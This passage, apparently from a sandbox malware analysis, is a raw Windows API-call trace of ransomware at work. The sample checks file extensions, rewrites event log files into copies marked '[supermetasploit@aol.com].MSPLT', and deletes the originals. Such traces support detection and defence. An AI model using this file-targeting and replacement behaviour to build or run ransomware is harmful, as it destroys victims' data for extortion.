lpString2="evtx") returned -1 [0295.329] lstrlenW (lpString=".7z") returned 3 [0295.329] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0295.329] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0295.329] lstrlenW (lpString=".dbf") returned 4 [0295.329] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0295.329] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0295.329] lstrlenW (lpString=".1cd") returned 4 [0295.329] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0295.329] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0295.329] lstrlenW (lpString=".jpg") returned 4 [0295.329] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0295.329] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0295.329] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0295.329] lstrlenW (lpString=".doc") returned 4 [0295.329] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0295.329] lstrlenW (lpString=".docx") returned 5 [0295.329] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0295.329] lstrlenW (lpString=".pdf") returned 4 [0295.329] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0295.329] lstrlenW (lpString=".xls") returned 4 [0295.329] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0295.329] lstrlenW (lpString=".xlsx") returned 5 [0295.329] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0295.329] lstrlenW (lpString=".ppt") returned 4 [0295.330] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0295.330] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0295.330] lstrlenW (lpString=".zip") returned 4 [0295.330] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0295.330] lstrlenW (lpString=".rar") returned 4 [0295.330] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0295.330] lstrlenW (lpString=".bz2") returned 4 [0295.330] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0295.330] lstrlenW (lpString=".7z") returned 3 [0295.330] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0295.330] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0295.330] lstrlenW (lpString=".dbf") returned 4 [0295.330] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0295.330] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0295.330] lstrlenW (lpString=".1cd") returned 4 [0295.330] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0295.330] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 90 [0295.330] lstrlenW (lpString=".jpg") returned 4 [0295.330] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0295.330] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0295.330] lstrlenW (lpString="Microsoft-Windows-Winlogon%4Operational.evtx") returned 44 [0295.331] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0295.331] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=69632) returned 1 [0295.331] CloseHandle (hObject=0x47c) returned 1 [0295.331] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx")) returned 0x20 [0295.331] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0295.332] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0295.332] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.332] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.332] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0295.332] GetLastError () returned 0x0 [0295.332] ReadFile (in: hFile=0x47c, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x11000, lpOverlapped=0x0) returned 1 [0295.339] WriteFile (in: hFile=0x454, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x11010, lpOverlapped=0x0) returned 1 [0295.343] ReadFile (in: hFile=0x47c, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0295.343] WriteFile (in: hFile=0x454, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x12c, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x12c, lpOverlapped=0x0) returned 1 [0295.344] SetEndOfFile (hFile=0x454) returned 1 [0295.344] CloseHandle (hObject=0x454) returned 1 [0295.347] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.347] SetEndOfFile (hFile=0x47c) returned 1 [0295.349] CloseHandle (hObject=0x47c) returned 1 [0295.349] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0295.350] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx")) returned 1 [0295.350] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 52 [0295.350] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 52 [0295.350] lstrlenW (lpString=".doc") returned 4 [0295.350] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0295.350] lstrlenW (lpString=".docx") returned 5 [0295.350] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0295.350] lstrlenW (lpString=".pdf") returned 4 [0295.350] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0295.350] lstrlenW (lpString=".xls") returned 4 [0295.350] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0295.350] lstrlenW (lpString=".xlsx") returned 5 [0295.351] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0295.351] lstrlenW (lpString=".ppt") returned 4 [0295.351] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0295.351] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 52 [0295.351] lstrlenW (lpString=".zip") returned 4 [0295.351] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0295.351] lstrlenW (lpString=".rar") returned 4 [0295.351] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0295.351] lstrlenW (lpString=".bz2") returned 4 [0295.351] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0295.351] lstrlenW (lpString=".7z") returned 3 [0295.351] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0295.351] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 52 [0295.351] lstrlenW (lpString=".dbf") returned 4 [0295.351] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0295.351] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 52 [0295.351] lstrlenW (lpString=".1cd") returned 4 [0295.351] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0295.351] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 52 [0295.351] lstrlenW (lpString=".jpg") returned 4 [0295.351] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0295.351] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 52 [0295.351] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 52 [0295.352] lstrlenW (lpString=".doc") returned 4 [0295.352] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0295.352] lstrlenW (lpString=".docx") returned 5 [0295.352] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0295.352] lstrlenW (lpString=".pdf") returned 4 [0295.352] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0295.352] lstrlenW (lpString=".xls") returned 4 [0295.352] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0295.352] lstrlenW (lpString=".xlsx") returned 5 [0295.352] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0295.352] lstrlenW (lpString=".ppt") returned 4 [0295.352] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0295.352] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 52 [0295.352] lstrlenW (lpString=".zip") returned 4 [0295.352] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0295.352] lstrlenW (lpString=".rar") returned 4 [0295.352] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0295.353] lstrlenW (lpString=".bz2") returned 4 [0295.353] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0295.353] lstrlenW (lpString=".7z") returned 3 [0295.353] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0295.353] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 52 [0295.353] lstrlenW (lpString=".dbf") returned 4 [0295.353] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0295.353] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 52 [0295.353] lstrlenW (lpString=".1cd") returned 4 [0295.353] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0295.353] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned 52 [0295.353] lstrlenW (lpString=".jpg") returned 4 [0295.353] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0295.353] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0295.353] lstrlenW (lpString="Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 48 [0295.353] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0295.354] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=1052672) returned 1 [0295.354] CloseHandle (hObject=0x47c) returned 1 [0295.354] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx")) returned 0x20 [0295.354] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0295.354] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0295.355] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.355] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.355] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0295.355] GetLastError () returned 0x0 [0295.355] ReadFile (in: hFile=0x47c, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0xffff0, lpOverlapped=0x0) returned 1 [0295.716] WriteFile (in: hFile=0x454, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0xffff0, lpOverlapped=0x0) returned 1 [0296.124] ReadFile (in: hFile=0x47c, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x1010, lpOverlapped=0x0) returned 1 [0296.138] WriteFile (in: hFile=0x454, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x1020, lpOverlapped=0x0) returned 1 [0296.144] ReadFile (in: hFile=0x47c, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0296.145] WriteFile (in: hFile=0x454, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x134, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x134, lpOverlapped=0x0) returned 1 [0296.145] SetEndOfFile (hFile=0x454) returned 1 [0296.145] CloseHandle (hObject=0x454) returned 1 [0296.562] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0296.562] SetEndOfFile (hFile=0x47c) returned 1 [0296.563] CloseHandle (hObject=0x47c) returned 1 [0296.563] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0296.564] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx")) returned 1 [0296.564] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 56 [0296.564] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 56 [0296.564] lstrlenW (lpString=".doc") returned 4 [0296.564] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0296.564] lstrlenW (lpString=".docx") returned 5 [0296.564] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0296.564] lstrlenW (lpString=".pdf") returned 4 [0296.564] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0296.565] lstrlenW (lpString=".xls") returned 4 [0296.565] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0296.565] lstrlenW (lpString=".xlsx") returned 5 [0296.565] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0296.565] lstrlenW (lpString=".ppt") returned 4 [0296.565] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0296.565] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 56 [0296.565] lstrlenW (lpString=".zip") returned 4 [0296.565] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0296.565] lstrlenW (lpString=".rar") returned 4 [0296.565] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0296.565] lstrlenW (lpString=".bz2") returned 4 [0296.565] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0296.565] lstrlenW (lpString=".7z") returned 3 [0296.565] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0296.565] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 56 [0296.565] lstrlenW (lpString=".dbf") returned 4 [0296.565] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0296.565] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 56 [0296.565] lstrlenW (lpString=".1cd") returned 4 [0296.565] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0296.565] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 56 [0296.565] lstrlenW (lpString=".jpg") returned 4 [0296.565] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0296.566] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 56 [0296.566] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 56 [0296.566] lstrlenW (lpString=".doc") returned 4 [0296.566] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0296.566] lstrlenW (lpString=".docx") returned 5 [0296.566] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0296.566] lstrlenW (lpString=".pdf") returned 4 [0296.566] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0296.566] lstrlenW (lpString=".xls") returned 4 [0296.566] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0296.566] lstrlenW (lpString=".xlsx") returned 5 [0296.566] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0296.566] lstrlenW (lpString=".ppt") returned 4 [0296.566] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0296.566] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 56 [0296.566] lstrlenW (lpString=".zip") returned 4 [0296.566] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0296.566] lstrlenW (lpString=".rar") returned 4 [0296.566] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0296.566] lstrlenW (lpString=".bz2") returned 4 [0296.566] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0296.566] lstrlenW (lpString=".7z") returned 3 [0296.566] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0296.566] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 56 [0296.566] lstrlenW (lpString=".dbf") returned 4 [0296.566] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0296.567] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 56 [0296.567] lstrlenW (lpString=".1cd") returned 4 [0296.567] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0296.567] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned 56 [0296.567] lstrlenW (lpString=".jpg") returned 4 [0296.567] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0296.567] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0296.567] lstrlenW (lpString="api-ms-win-core-file-l1-2-0.dll") returned 31 [0296.567] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0296.568] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=18624) returned 1 [0296.568] CloseHandle (hObject=0x47c) returned 1 [0296.568] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll")) returned 0x20 [0296.568] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0296.568] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0296.569] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 89 [0296.569] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 89 [0296.569] lstrlenW (lpString=".doc") returned 4 [0296.569] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.569] lstrlenW (lpString=".docx") returned 5 [0296.569] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0296.569] lstrlenW (lpString=".pdf") returned 4 [0296.569] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.569] lstrlenW (lpString=".xls") returned 4 [0296.569] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.569] lstrlenW (lpString=".xlsx") returned 5 [0296.569] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0296.569] lstrlenW (lpString=".ppt") returned 4 [0296.569] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.569] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 89 [0296.569] lstrlenW (lpString=".zip") returned 4 [0296.569] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.569] lstrlenW (lpString=".rar") returned 4 [0296.569] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.569] lstrlenW (lpString=".bz2") returned 4 [0296.569] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.569] lstrlenW (lpString=".7z") returned 3 [0296.569] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.570] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 89 [0296.570] lstrlenW (lpString=".dbf") returned 4 [0296.570] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.570] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 89 [0296.570] lstrlenW (lpString=".1cd") returned 4 [0296.570] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.570] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 89 [0296.570] lstrlenW (lpString=".jpg") returned 4 [0296.570] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.570] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 89 [0296.570] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 89 [0296.570] lstrlenW (lpString=".doc") returned 4 [0296.570] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.570] lstrlenW (lpString=".docx") returned 5 [0296.570] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0296.570] lstrlenW (lpString=".pdf") returned 4 [0296.570] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.570] lstrlenW (lpString=".xls") returned 4 [0296.570] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.570] lstrlenW (lpString=".xlsx") returned 5 [0296.570] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0296.570] lstrlenW (lpString=".ppt") returned 4 [0296.570] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 89 [0296.571] lstrlenW (lpString=".zip") returned 4 [0296.571] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.571] lstrlenW (lpString=".rar") returned 4 [0296.571] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.571] lstrlenW (lpString=".bz2") returned 4 [0296.571] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.571] lstrlenW (lpString=".7z") returned 3 [0296.571] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 89 [0296.571] lstrlenW (lpString=".dbf") returned 4 [0296.571] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 89 [0296.571] lstrlenW (lpString=".1cd") returned 4 [0296.571] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 89 [0296.571] lstrlenW (lpString=".jpg") returned 4 [0296.571] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.571] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0296.572] lstrlenW (lpString="api-ms-win-core-file-l2-1-0.dll") returned 31 [0296.572] CreateFileW (lpFileName="C:\\Program Files\\Common 